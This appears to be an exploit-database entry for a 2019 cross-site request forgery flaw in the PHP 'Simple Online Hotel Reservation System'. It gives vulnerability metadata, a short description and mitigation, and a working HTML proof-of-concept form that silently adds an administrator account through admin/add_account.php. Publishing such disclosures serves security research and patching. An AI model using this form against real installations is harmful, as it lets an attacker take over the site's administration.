Simple Online Hotel Reservation System - Cross-Site Request Forgery (Add Admin)

vendor:

Simple Online Hotel Reservation System

by:

Mr Winst0n

8.8

CVSS

HIGH

Cross-Site Request Forgery

352

CWE

Product Name: Simple Online Hotel Reservation System

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Kali Linux, Windows 8.1

2019

Simple Online Hotel Reservation System – Cross-Site Request Forgery (Add Admin)

A Cross-Site Request Forgery (CSRF) vulnerability exists in Simple Online Hotel Reservation System, which allows an attacker to add an admin account without authentication. This vulnerability is due to the lack of CSRF protection in the add_account.php page, which allows an attacker to craft a malicious HTML page that can add an admin account when visited by an authenticated user. This can be exploited to gain administrative access to the application.

Mitigation:

Implement CSRF protection on all pages that perform sensitive operations.

Source

Exploit-DB raw data:

# Exploit Title: Simple Online Hotel Reservation System  - Cross-Site Request Forgery (Add Admin)
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan[@]gmail[.]com
# Discovery Date: February 25, 2019
# Vendor Homepage: https://code-projects.org/
# Software Link : https://code-projects.org/simple-online-hotel-reservation-system-in-php-with-source-code/
# Tested on: Kali linux, Windows 8.1 

# PoC:

<html>
<head>
	<title>Add Admin</title>
</head>
<body>
	<form method = "POST" action="http://localhost/[PATH]/admin/add_account.php">
		<label>Name </label>
		<input type = "text" name = "name" /><br><br>
		<label>Username </label>
		<input type = "text" name = "username" /><br><br>
		<label>Password </label>
		<input type = "password" name = "password" /><br><br>
		<button name = "add_account">Saved</button>
	</div>
	</form>
</body>
</html>